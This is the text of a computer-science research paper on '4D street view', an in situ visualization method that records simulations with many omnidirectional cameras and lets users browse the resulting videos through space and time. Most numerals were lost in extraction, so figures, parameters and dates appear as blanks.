data collection is a discrete subset of continuous function of pixel data defined in a five-dimensional space; the camera position in d and the viewing direction in d. adelson & bergen ( ) call the five-dimensional function “plenoptic function”, from plenus (complete)-optic. in short, our method connotes sightseeing in d. specifying a path in spacetime (see fig. ), we extract a sequence of images along the path. the images are presented figure video data collections and a path in d spacetime. since the videos in the data collection are tied with their camera position, we can identify the data collection as a field of omnidirectional still images distributed in d (x, y, z and t) space. the user specifies a path in spacetime, and an application program extracts a sequence of images on the path and shows them on the pc window as a smooth video. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ on the pc window as a smooth video. if we notice an intriguing dynamics of the simulation in the video, we can fly to the location (i.e., we read the video file whose camera is close to the location) and observe the phenomenon. note that we can also go back in time (or play the video backward in time) to identify the cause of the dynamics. we call this visualization method “four dimensional ( d) street view” because it is reminiscent of google street view (anguelov et al., ). another ancestor of d street view is quicktime vr (chen, ) that realized the interactive navigation of multiple files of panoramic pictures. the idea of interactive retrieval of image sequences from multiple video files can be traced back to “movie-maps” by lippman ( ), in which the user interactively switch video segments at preregistered points. the actual procedure of the d street view is separated into three stages, namely, the recording, conversion, and browsing. in the recording stage, we apply in situ visualizations on a supercomputer system with many omnidirectional cameras. in the conversion stage, we convert the output image dataset into a video data collection, which is the input of the browsing stage. in the browsing stage, we specify the camera path in d interactively and view the video on a pc window by a dedicated application program called d street viewer. recording stage of d street view the recording stage of the d street view should have the following three items, namely, multiple points of view, omnidirectional rendering, and in situ visualization. multi-point visualization the multi-point visualization is theoretically the most straightforward part among the three items because it is generally possible to set plural viewpoints in an in situ visualization tool. in the d street view, the configuration of the omnidirectional cameras is arbitrary. herein, we place them in rectilinear distributions, that is, uniformly distributed in the x, y and z directions with the same spacings between the cameras in each direction. we denote the number of cameras in each direction as cx, cy and cz. the total number of cameras is cx × cy × cz. figure shows two types of distribution of omnidirectional cameras (green spheres) that are used in test simulations described later. in (a) and (b), the camera configuration is (cx, cy, cz) = ( , , ), and in (c) and (d), it is (cx, cy, cz) = ( , , ). the rectangular boxes in the figure denote the boundary of the simulations. omnidirectional visualization to apply omnidirectional visualization from each camera, we follow the standard procedure of the cube mapping (greene, ; sellers, wright & haemel, ). we assume a virtual sphere and a cube around the point; see fig. a. projecting the edges of the cube onto the sphere from the center, we have twelve arcs of great circles. the arcs divide the sphere or the p solid angle into six parts, that is, front, back, right, left, top, and bottom. we perform visualizations with the regular perspective projection six times for the six areas. as a result, we obtain six pictures and save them in the portable kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ network graphics (png) format using libpng library during the simulation. note that png is a graphics format with lossless compression. the pixel size of the six perspective projections used herein is × . an example of the six images is shown in fig. b. the six png files are combined to a single file as an omnidirectional image after the simulation in the conversion stage to be described later. we can, of course, directly apply the conversion to the omnidirectional images during the simulation. implementing such functions is one of the future topics of this research. it would also be possible to use a visualization tool with direct rendering with the omnidirectional projection. in situ visualization we can choose any in situ visualization strategy for the recording stage. here, we take the synchronous approach wherein the visualization functions are called and controlled by the simulation program. the same approach is taken, for example, by yu et al. ( ). in this synchronous in situ visualization method, the simulation and visualization programs share the computer nodes. the computation for the simulation is suspended figure two samples of the omnidirectional camera configuration (green spheres). (a & b) -d configuration of , cameras (viewed from different angles) used in the test simulation of the vortex- ring. (c & d) -d configuration of cameras for the test simulation of hall mhd turbulence. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ while the visualization is running. there is another approach to in situ visualization, referred to as the asynchronous in situ visualization, as in dreher & raffin ( ). in this case, the visualization program runs independent of the simulation program. we will comment on this asynchronous in situ visualization in conclusions. as a renderer, we use vismo (ohno & ohtani, ) in this study. vismo is an in situ visualization library written in fortran. it supports fundamental visualization methods, including the isosurface, slice plane, arrow glyphs, streamlines, and volume rendering. an essential feature of vismo is that all the visualization methods are implemented based on the ray casting algorithm (levoy & marc, ). therefore, vismo can perform the in situ visualization on supercomputer systems with no gpu. vismo is a self-contained library that requires no other basic tools or libraries except for libpng and a fortran compiler. we can get visualization images with a simulation program by just calling vismo’s functions. this is a great merit for simulation researchers. in our experiences, one of the general practical burdens in the situ visualization is the preparation of a necessary environment for a supercomputer system, for example, to install osmesa that is a basic off-screen rendering library for opengl. srend (wetherbee et al., ) is a similar library as vismo; it performs the in situ visualization of the volume rendering by the ray casting. data conversion to mp as described above, every in situ visualization from a fixed point of view produces a set of six png images. after the simulation, we combine the six files into a single image, according to the following procedure. firstly, we assume that the six images are projected onto the sphere (see fig. a). the spherical image is then mapped to a single rectangular image by the equirectangular projection. the pixel size for the omnidirectional image in this work is , × , . figure the omnidirectional visualization method in this study. (a) we divide the solid angle p around a point of view into six parts by projecting the edges of a cube onto a sphere. the centers of the cube and sphere are on the point. we then apply the standard perspective projections for each part for six times. (b) example of the six images obtained by the in situ visualization in a test simulation. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a set of omnidirectional image files from a certain camera position is then converted to a video file with mp codec (puri, chen & luthra, ), which invokes a lossy but quality preserving compression to reduce the size. we use ffmpeg for this conversion. test simulations to test d street view, we apply this method to three different kinds of simulations. thermal convection in spherical shell the first test simulation is thermal convection in a spherical shell vessel (see fig. ). a fluid is confined between two concentric spheres of radii ro = . and ri = . . inward central gravity (gravity acceleration g) and fixed temperature difference dt between the spheres drive the thermal convection motion. convection in spherical shells have been studied extensively in geophysics and astrophysics. the test simulation in this article is characterized by the lack of rotation of the spheres and the relatively shallow depth of the shell compared to the standard geophysical and astrophysical simulations. it is known that thermal convection in a spheical shell with relatively small gap, ro − ri, exhibits very different patterns, such as spiral rolls (zhang, liao & zhang, ; itano et al., ), from that in a deep shell. we solve the navier-stokes equation with the finite difference method on the yin-yang grid (kageyama & sato, ). we denote the spherical shell region on the spherical coordinate system r; ϑ; φf g as ri ≤ r ≤ ro, ≤ ϑ ≤ p, −p ≤ φ < p. the grid size in the radial span is nr = ; the grid size in the latitudinal span of yin- or yang-component grid (p/ ≤ ϑ ≤ p/ ) is nϑ = ; the grid size in the longitudinal span (− p/ ≤ φ ≤ p/ ) is nφ = . the total grid size is nr × nϑ × nφ × = × × × . (the last factor is for yin and yang components.) a fourth-order explicit runge-kutta method is used for the time integration. rayleigh number ra = × , which is a non-dimensional parameter that characterizes the drive of the convection. the initial condition of the simulation is force-balanced, convectively unstable state, that is, ∇p = ρ g, where ρ and p are mass density and pressure at time t = . the initial flow is zero; v = at t = . we put a perturbation δp to the initial pressure figure the simulation model of the spherical shell convection and the coordinate system. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ field, p = p + δ p(r, ϑ, φ), to start the convection. in this experiment, we set a single-mode of the spherical harmonics; dpðr; ϑ; φÞ ¼ aðrÞ~ym‘ ðϑ; φÞ, where ~ym‘ is (normalized) spherical harmonics; r ~ym‘ ~ym ‘ ds ¼ d‘‘ dmm . the radial function is given by aðrÞ ¼ c sinðp r � rið Þ=ðro � riÞÞ with c = × − . we set l = m = in this test simulation, which means that the perturbation δ p is highly localized in the (co)latitudinal direction ϑ, near the equator ϑ = p/ , while it has sinusoidal mode m = in the longitudinal direction φ. for d street view, we place c = omnidirectional cameras on the equatorial plane ϑ = p/ with (cx, cy, cz) = ( , , ). we record the time development of the spherical shell convection with a constant interval of non-dimensional time τ = . , from t = to t = . (for every simulation time-steps) for frames in total. figure shows the time development of the convection visualized by isosurfaces of normalized radial velocity vr. hall mhd turbulence the second simulation for the test of d street view is a magnetohydrodynamics (mhd) turbulence with the hall term. we incorporate in situ, multi-point, omnidirectional visualization cameras into a hall mhd turbulence simulation code (miura & hori, ; miura, araki & hamba, ; miura, ). in the simulation, the time development of the hall mhd equations are solved by the fourier pseudo-spectral method. the simulation geometry is a cube with the periodic boundary condition in all (x, y and z) directions with grid points in each direction. the / -truncation technique figure thermal convection in the spherical shell visualized by isosurfaces of normalized radial velocity vr = − . : the banana-like purple objects indicate the downward flow in the convection. (a)–(d) are convections at t = . , . , . and . , respectively, viewed from a point on the equatorial ϑ = p/ with radius r = . , (e)–(h) are omnidirectional images at the same instances taken by the omnidirectional camera placed at the spherical origin r = . full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is used for the de-aliasing. the runge–kutta–gill method is adopted for the temporal integration. as the initial condition, large scale velocity and magnetic fields are specified with random phases. just after the simulation starts, the fluid goes through instabilities and the velocity and magnetic energies are transferred toward smaller and smaller scales until it reaches to a fully developed turbulence. the highly complicated dynamics is a test bench of the true value of d street view for the interactive analysis of the in situ visualization. in this simulation, we try -d configuration of the omnidirectional cameras; (cx, cy, cz) = ( , , ) with viewpoints on the x axis with a constant spacing, as shown in figs. c and d. as shown in fig. , we apply the in situ visualizations for the isosurfaces of the electric current density (colored in green-to-red) and the enstrophy density (gray-to-white). figure the hall mhd simulations used as a test of d street view. we apply three in situ visuali- zations (isosurface for two different fields and superposition of the two visualizatio methods). the upper three panels are for the initial condition. the time goes on to the middle and lower panels. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ vortex ring formation the third test is simulation of vortex ring (or a smoke ring) formation, which is well know phenomenon; see for example, shariff & leonard ( ) and lim & nickels ( ) for reviews. we assume a quiet gas in a rectangular box and apply an impulsive force in a localized region when the simulation starts. the fluid in the forced region is driven in the direction of the force. although the initial flow exhibits complicated structures, the flow soon settles into a localized vortex in a simple torus, which is called a vortex ring. the vortex ring propagates at a uniform speed while maintaining its shape. the simulation model is as follows: we solve the navier-stokes equation for in the cartesian coordinate system (x, y, z). the simulation region is a rectangular box with normalized side lengths of lx × ly × lz = × × ; see fig. . the periodic boundary condition is assumed in all directions of x, y and z. the origin of the coordinate system is at the center of the simulation region. in the initial condition, the fluid has no flow with uniform temperature and density. we apply a pulse of force f to drive the fluid when the simulation starts at t = . the navier-stokes equation is discretized by a second order, central finite difference method. a fourth-order explicit runge-kutta method is used for the time integration. the periodic boundary condition is assumed for all (x, y and z) directions. for this simulation, we have tried three different configurations of the omnidirectional cameras; (cx, cy, cz) = ( , , ), ( , , ) and ( , , ) with three visualization methods; ( ) isosurface of the enstrophy density e = |∇ × v| , where v is the flow velocity; ( ) arrow glyphs of v; ( ) stream lines of v. figure simulation model of the vortex ring. (a) shows the simulation model. we assume a rec- tangular region filled with a compressible fluid with normalized side lengths , and in x, y and z directions, respectively. the origin of the coordinate system is at the center of the region. a pulse force in the +x direction is applied in a cylindrical region near the end boundary at x = − . the force drives the fluid in the cylinder and it soon settles into a ring-shaped vortex. (b–d) show vortex ring propagation in the +x direction. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we performed several experiments with different parameters for physics and visualization. in most cases, the driving force vector f has only the x component, but in one experiment, we also apply perpendicular (y and z) components in such a way that the driven flow has twisting component. it leads to an intriguing formation of the vortex ring with the flow helicity. d street viewer the omnidirectional video files are tied with their camera positions by means of their file names. for example, a video file named sample. .mp or sample. _ _ .mp is recorded by the omnidirectional camera located at (cx, cy, cz) = ( , , ) in the rectilinear configuration (cx, cy, cz). the video files termed according to this naming convention constitute the input data collection of the d street viewer. the user specifies a camera position (cx, cy, cz) and changes it in real time through the d street viewer. some keys on the keyboard are allocated to increment or decrement cx, cy and cz. additionally, the user can specify the next camera to move by mouse clicks. a mouse click specifies a direction where one wants to move in the presented simulation space in the window. the d street viewer picks up one of neighboring cameras (cx ± , cy ± , cz ± ) that is the closest to the line defined by the direction. each time the user specifies a new camera position or switches to a new visualization method, the d street viewer retrieves the corresponding file from the data collection. it imports one file at a time directly from the data collection without buffering or prefetching. since the frame number in the video is consistently passed over to the next video, the user can smoothly change the video file while playing a video. figure shows a snapshot of the window of the d street viewer with its user interface. one can resize the window by dragging a corner of the window with the mouse. shown in the left panel is the view of the simulation from the current camera position and direction. in the right panel of the window, some texts are placed to present input video and the current status. the playing mode of the video (play/stop/reverse) as well as the current frame are controlled by the buttons and slider bars in the right panel. we have developed a d street viewer in the framework of kvs (sakamoto & koyamada, ). kvs is a visualization development framework provided as a c++ class library. although the primary purpose of kvs is to provide a modular programming environment for scientific and information visualizations, it can also be used as a more general framework for the development of such a d street viewer as this. interactive analysis of the test simulations with d street view viewpoint translation we first present an interactive translation of the viewpoint by d street viewer, applied to the hall mhd simulation. figure is a sequence of six snapshots from a recorded video in supplemental data (https://github.com/vizlab-kobe/ dsvtestdata/blob/master/ movies/ -hall-mhd.mov). since the number of the omnidirectional cameras along the kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/vizlab-kobe/ dsvtestdata/blob/master/movies/ -hall-mhd.mov https://github.com/vizlab-kobe/ dsvtestdata/blob/master/movies/ -hall-mhd.mov http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure a snapshot of the window of the d street viewer. the left panel shows the current view extracted from an omnidirectional image in the input video. the camera configuration (cx, cy, cz), current camera position (cx, cy, cz), current number of frame, and other information of the video data collection are shown in the right panel. full-size doi: . /peerj-cs. /fig- figure translation of the viewpoint in the hall mhd simulation. (a–f) show an image sequence in the walk-through in the simulation region. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ axis is sufficiently high ( cameras), the user has a smooth experience of walk-through by changing the viewpoint by means of slide bar, mouse click or keyboard input. although the six images (a)–(f) show the same frame (t = ) in this fig. , the video in supplemental data present the interactive translation also in time in the simulation’s space-time. note that the smooth experience of the walk-through by the viewpoint translation by d street view is not degraded even if the visualized scene is much more complicated when the turbulence is fully developed. (see the later part of the supplemental video.) on the other hand, if we applied the post-hoc visualization for the fully developed turbulence, such as the bottom three panels in fig. , the response would be slowed down for there are myriads of polygons. looking around as in standard visualization applications, a mouse drag is allocated to the rotation of the view in the d street viewer. in our case, a rotation means resampling of the field-of- view around the specified direction from the omnidirectional image, as in the regular video-playing programs for panoramic videos. we perform the resampling with a gpu. in the standard post-hoc visualization programs, a rotation specified by a user invokes a rotational transformation of the scene in the computer graphics. getting a new image after a rotation may be time-consuming if the rotated scene requires a massive rendering. as in the case of the viewpoint translation, in the d street view, a rotated image always appears momentarily, regardless of the complexity of the scene, since views from any angle are already stored in the omnidirectional video. figure is a snapshot sequence taken from a video in supplemental data (https://github. com/vizlab-kobe/ dsvtestdata/blob/master/movies/ -thin-shell-convection.mov). this figure demonstrates the changing the viewing-direction by d street viewer, for the spherical shell convection simulation. in the the left three panels, the viewpoint is located at a point on the equator at r = . , which is just inside the inner sphere r = ri. the purple bar-like objects are isosurfaces of negative velocity vr; they denotes the downward flow of the convection cells (or convection rolls). the time frame is fixed in the left three panels. in the right three panels of fig. , we move to the viewpoint located at the origin r = . we then play the video forward in time for a while to observe that the bar-like convection rolls grows toward the north and south poles, applying the mouse-drag again to observe the ring-like patterns near the north pole. the bar-like structure of the convection rolls cannot be maintained in the high latitude regions because the distances between the neighboring rolls (in the longitudinal direction) are decreased as the tips of the rolls get closer to the poles. instead of the longitudinal rolls in the low-latitude regions, ring-like pattern appears in the polar regions, which is observed by isosurface of positive vr (upward flow) in the right three panels. kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/vizlab-kobe/ dsvtestdata/blob/master/movies/ -thin-shell-convection.mov https://github.com/vizlab-kobe/ dsvtestdata/blob/master/movies/ -thin-shell-convection.mov http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ change of visualization method we have changed the visualization method in d street viewer from the left panels to the right panels in fig. . figure shows another example of the interactive switching of the applied visualization methods. this figure is an image sequence taken from a video in supplemental data (https://github.com/vizlab-kobe/ dsvtestdata/blob/master/movies/ -vortex-ring.mov). in this case, simulation of the vortex ring with the twisting force is visualized by (i) isosurface of enstrophy density e and (i) isosurface of e plus stream lines of the flow velocity v. in this visualization, we change time frame, viewpoint position, viewing direction, and visualization method (with and without the stream lines). discussion the mp conversion by ffmpeg from the png images is the only stage wherein lossy compression is applied in our procedure. (the mapping to an omnidirectional image from the six directional images described incorporates pixel interpolations, but the image deterioration by the interpolation is negligibly small). to confirm the impacts of the lossy compression by mp , we compare, in fig. , an omnidirectional png image and figure change of viewing direction of the spherical shell convection in the d street viewer by the mouse drag motion. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/vizlab-kobe/ dsvtestdata/blob/master/movies/ -vortex-ring.mov https://github.com/vizlab-kobe/ dsvtestdata/blob/master/movies/ -vortex-ring.mov http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an image extracted from the mp video by d street viewer at the same frame. the degradation of the image quality by the mp conversion is negligibly small for visualization analysis. in this work, the largest number of the omnidirectional cameras scattered in the test simulations was , that are for the vortex ring simulation. we applied two figure the vortex ring simulation with the twist force. the vortex ring simulation with the twist force. two visualization methods (with and without the stream lines) are switched while playing the video. (a) shows an isosurface visualization without the stream lines. (b–e) show the same time frame with different view position and direction. (e) and (f) are also from the same frame later in the time development. full-size doi: . /peerj-cs. /fig- figure comparison of images before (a) and after (b) the lossy compression by mp codec. (a) the original omnidirectional png image. (b) snapshot from mp video file at the same frame. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ visualizations from each camera and the total size of the video files ( , × , pixels × frames) compressed in the mp codec was . × b. this result shows that the data size of the video data collection in the d street view with a thousand cameras can be regarded as small in today’s capacity norm of storage devices. the small size of the video data collection is due to the compression by the mp codec. for the hall mhd simulation, we performed with the spatial resolution of and applied the in situ visualization for time frames. the total storage size to save the three kinds of omnidirectional mp video files (electric current, enstrophy density, and their superposition) are . × b. on the other hand, if we are to perform the post-hoc visualization, we would have to save raw numerical data of at least four fields (three components of the velocity vector plus one scalar) for the double precision ( b) simulation. the storage size amounts to × (fields) × (time steps) × b ∼ . × b. even in this small-scale simulation, the storage size for d street view method is smaller than the post-hoc visualization. the spatial resolution is too low in the current standard of the high performance computing. it is not rare to perform turbulence simulations with , resolution these days. saving the raw numerical data for the post-hoc visualization with this spatial resolution (and with corresponding temporal resolution) is certainly impractical: , × (fields) × (time steps) × b ∼ . × b. on the other hand, the storage size for d street view is only weakly dependent on the spatial resolution of the simulation. in this work, we have placed the omnidirectional cameras in rectilinear configuration of -d, -d, or -d. however, the camera density is not necessarily uniform in the d street view. we can reduce the total number of cameras by distributing them in a nonuniform way, concentrating only near focused regions. the video collection explored in the d street view is a set of discrete samples of continuous plenoptic function (adelson & bergen, ) in the d space. it would be possible to apply image-based rendering techniques in computer graphics such as “view interpolation” (chen & williams, ) or “plenoptic modeling” (mcmillan & bishop, ) to obtain visualized images viewed from intermediate positions between specified view points. generally, in situ visualization is a way to use supercomputer resources to suppress the burden of simulation researchers. they have recently spent most of their research time on post-hoc visualization, such as data transfer and preparation before starting the visualization itself. the situation will become worse in the future with the further development of supercomputer technology. even today, the computing power for a single supercomputer system is excessive for a single simulation job. it would be a valid idea to use a supercomputer system primarily for the visualization and secondly for the simulation. conclusions we have proposed a new visualization method referred to as the “ d street view” for large-scale simulations. the key idea is to record a simulation with many omnidirectional kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cameras that are scattered in the simulation space. the cameras record the simulation through in situ visualization. as a result of the simulation, we obtain a data collection of the omnidirectional videos. the videos in the data collection are tied with their camera positions. the video data collection can be regarded as a field of omnidirectional still images in d spacetime. we have developed a dedicated application program ( d street viewer) to explore video data collection. with the program, we interactively specify a path in d spacetime and extract a sequence of images along the path and show them as a smooth video on the screen. if we find an intriguing phenomenon that is far away from the current camera, we can “fly” there with the d street viewer and scrutinize it from nearby cameras. it is also possible to go backward in time to investigate the cause of the phenomenon. we can change the view-angle anytime since all views are stored in the omnidirectional images. we can also switch the applied visualization methods as long as the corresponding videos have been recorded in the simulation. one of the challenges of the d street view is the time spent on the visualization. we have applied the synchronous in situ visualization in this work; the same computer nodes are allocated for the simulation and the visualization. the parallelization of the simulation determined the number of nodes. when we perform a visualization-intensive computation, we should allocate much more nodes to the in situ visualization than the simulation. we are developing another approach—asynchronous in situ visualization— for the recording stage of the d street view (kageyama, sakamoto & yamamoto, ). the simulation program and the visualization program run independently on different computer nodes with no explicit synchronization. they have their own main programs and own mpi_init and mpi_finalize calls. to realize this multiple program, multiple data (mppd) framework, we place a layer called membrane between the simulation and the visualization. with this the membrane method, we can allocate any number of computer nodes for the in situ visualization of visualization-intensive cases. acknowledgements we would like to thank prof. chandrajit bajaj for suggesting the use of omnidirectional cameras to improve our mutil-point in situ visualization method. we thank ms. keiko otsuji for her skilled technical assistance. we are grateful to prof. nobuaki ohno for providing us with the vismo’s source code. we are also grateful to prof. hedeaki miura for providing us with the hall mhd simulation code. additional information and declarations funding this work was supported by grant-in-aid for scientific research (kakenhi) k and h , scat (support center for advanced telecommunications technology research) foundation, i-o data foundation, and tateishi science and technology kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ foundation. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: grant-in-aid for scientific research (kakenhi): k and h . support center for advanced telecommunications technology research (scat) foundation. i-o data foundation. tateishi science and technology foundation. competing interests the authors declare that they have no competing interests. author contributions � akira kageyama conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � naohisa sakamoto analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: source code is available at github: https://github.com/vizlab-kobe/ dstreetviewmovieviewer. data are available at github: https://github.com/vizlab-kobe/ dsvtestdata. sample movies are available at github: https://github.com/vizlab-kobe/ dsvtestdata/tree/master/movies. references adelson eh, bergen jr. . the plenoptic function and the elements of early vision. in: landy m, movshon ja, eds. computational models of visual processing. cambridge: the mit press, – . ahrens j, jourdain s, o’leary p, patchett j, rogers dh, petersen m. . an image-based approach to extreme scale in situ visualization and analysis. in: sc ’ : proceedings of the international conference for high performance computing, networking, storage and analysis. – . anguelov d, dulong c, filip d, frueh c, lafon s, lyon r, ogale a, vincent l, weaver j. . google street view: capturing the world at street level. computer ( ): – doi . /mc. . . ayachit u, bauer a, geveci b, o’leary p, moreland k, fabian n, mauldin j. . paraview catalyst. in: proceedings of the first workshop on in situ infrastructures for enabling extreme-scale analysis and visualization—isav . new york: acm press, – . kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/vizlab-kobe/ dstreetviewmovieviewer https://github.com/vizlab-kobe/ dsvtestdata https://github.com/vizlab-kobe/ dsvtestdata/tree/master/movies http://dx.doi.org/ . /mc. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ayachit u, whitlock b, wolf m, loring b, geveci b, lonie d, bethel ew. . the sensei generic in situ interface. in: proceedings of isav : workshop on in situ infrastructures for enabling extreme-scale analysis and visualization - held in conjunction with sc . – . banesh d, schoonover ja, ahrens jp, hamann b. . extracting, visualizing and tracking mesoscale ocean eddies in two-dimensional image sequences using contours and moments. in: rink k, middel a, zeckzer d, bujack r, eds. workshop on visualisation in environmental sciences. darmstadt: the eurographics association, – . berres as, turton tl, petersen m, rogers dh, ahrens jp. . video compression for ocean simulation image databases. darmstadt: the eurographics association. chen se. . quicktime vr—an image-based approach to virtual environment navigation. in: proceedings of the acm siggraph conference on computer graphics. new york: acm, – . chen se, williams l. . view interpolation for image synthesis. in: th annual conference on computer graphics and interactive techniques, siggraph , new york, association for computing machinery, inc. new york: acm, – . childs h, ma k-l, yu h, whitlock b, meredith j, favre j, klasky s, podhorszki n. . in situ processing. in: betherl ew, childs h, hansen c, eds. high performance visualization: enabling extreme scale scientific insight, chapter . london: chapman and hall, – . dreher m, raffin b. . a flexible framework for asynchronous in situ and in transit analytics for scientific simulations. in: th ieee/acm international symposium on cluster, cloud, and grid computing. piscataway: ieee, – . greene n. . environment mapping and other applications of world projections. ieee computer graphics and applications ( ): – . itano t, ninomiya t, konno k, sugihara-seki m. . spiral roll state in heat convection between nonrotating concentric double spherical boundaries. journal of the physical society of japan ( ): doi . /jpsj. . . kageyama a, sakamoto n, yamamoto k. . membrane layer method to separate simulation and visualization. in: th international conference on simulation and modeling methodologies, technologies and applications. – . kageyama a, sato t. . “yin-yang grid”: an overset grid in spherical geometry. geochemistry, geophysics, geosystems :q . kageyama a, yamada t. . an approach to exascale visualization: interactive viewing of in- situ visualization. computer physics communications ( ): – doi . /j.cpc. . . . kawamura t, noda t, idomura y. . in-situ visual exploration of multivariate volume data based on particle based volume rendering. in: nd workshop on in situ infrastructures for enabling extreme-scale analysis and visualization. – . kress j, pugmire d, klasky s, childs h. . visualization and analysis requirements for in situ processing for a large-scale fusion simulation code. in: proceedings of the nd workshop on in situ infrastructures for enabling extreme-scale analysis and visualization. – . levoy m, hanrahan p. . light field rendering. in: proceedings of the rd annual conference on computer graphics and interactive techniques, siggraph . – . levoy m, marc. . efficient ray tracing of volume data. acm transactions on graphics ( ): – doi . / . . lim tt, nickels tb. . vortex rings. in: fluid vortices. dordrecht: kluwer academic publishers, – . kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /jpsj. . http://dx.doi.org/ . /j.cpc. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lippman a. . movie-maps: an application of the optical videodisc to computer graphics. comput graphics ( ): – doi . / . . lofstead j, klasky s, schwan k, podhorszki n, jin c. . flexible io and integration for scientific codes through the adaptable io system (adios). in: proceedings of the th international workshop on challenges of large applications in distributed environments. – . ma k-l. . in situ visualization at extreme scale: challenges and opportunities. in: ieee computer graphics and applications. piscataway: ieee, – . ma kl, wang c, yu h, tikhonova a. . in-situ processing and visualization for ultrascale simulations. journal of physics: conference series ( ): – . matthes a, huebl a, widera r, grottel s, gumhold s, bussmann m. . in situ, steerable, hardware-independent and data-structure agnostic visualization with isaac. supercomputing frontiers and innovations ( ): – . mcmillan l, bishop g. . plenoptic modeling: an image-based rendering system. in: proceedings of the acm siggraph conference on computer graphics, vol. . – . miller g, hoffert e, chen se, patterson e, blackketter d, rubin s, applin sa, yim d, hanan j. . the virtual museum: interactive d navigation of a multimedia database. journal of visualization and computer animation ( ): – doi . /vis. . miura h. . extended magnetohydrodynamic simulations of decaying, homogeneous, approximately-isotropic and incompressible turbulence. fluids ( ): doi . /fluids . miura h, araki k, hamba f. . hall effects and sub-grid-scale modeling in magnetohydrodynamic turbulence simulations. journal of computational physics : – doi . /j.jcp. . . . miura h, hori d. . hall effects on local structures in decaying mhd turbulence. journal of plasma fusion research : – . ohno n, ohtani h. . development of in-situ visualization tool for pic simulation. plasma and fusion research : doi . /pfr. . . o’leary p, ahrens j, jourdain s, wittenburg s, rogers dh, petersen m. . cinema image-based in situ analysis and visualization of mpas-ocean simulations. parallel computing : – doi . /j.parco. . . . puri a, chen x, luthra a. . video coding using the h. /mpeg- avc compression standard. signal processing: image communication ( ): – doi . /j.image. . . . ross rb, peterka t, shen hw, hong y, ma kl, yu h, moreland k. . visualization and parallel i/o at extreme scale. journal of physics: conference series : doi . / - / / / . sakamoto n, koyamada k. . kvs: a simple and effective framework for scientific visualization. journal of advanced simulation in science and engineering ( ): – doi . /jasse. . . sakamoto n, nonaka j, koyamada k, tanaka s. . particle-based volume rendering. in: th international asia-pacific symposium on visualization. piscataway: ieee, – . schroeder w, martin k, lorensen b. . the visualization toolkit: an object-oriented approach to -d graphics. fourth edition. new york: kitware. sellers g, wright rs, haemel n. . opengl superbible: comprehensive tutorial and reference. seventh edition. boston: addison-wesley. kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . /vis. http://dx.doi.org/ . /fluids http://dx.doi.org/ . /j.jcp. . . http://dx.doi.org/ . /pfr. . http://dx.doi.org/ . /j.parco. . . http://dx.doi.org/ . /j.image. . . http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /jasse. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ shariff k, leonard a. . vortex rings. annual review of fluid mechanics ( ): – doi . /annurev.fl. . . . shum h, kang sb. . review of image-based rendering techniques. visual communications and image processing : . tikhonova a, correa cd, ma k-l. a. explorable images for visualizing volume data. in: 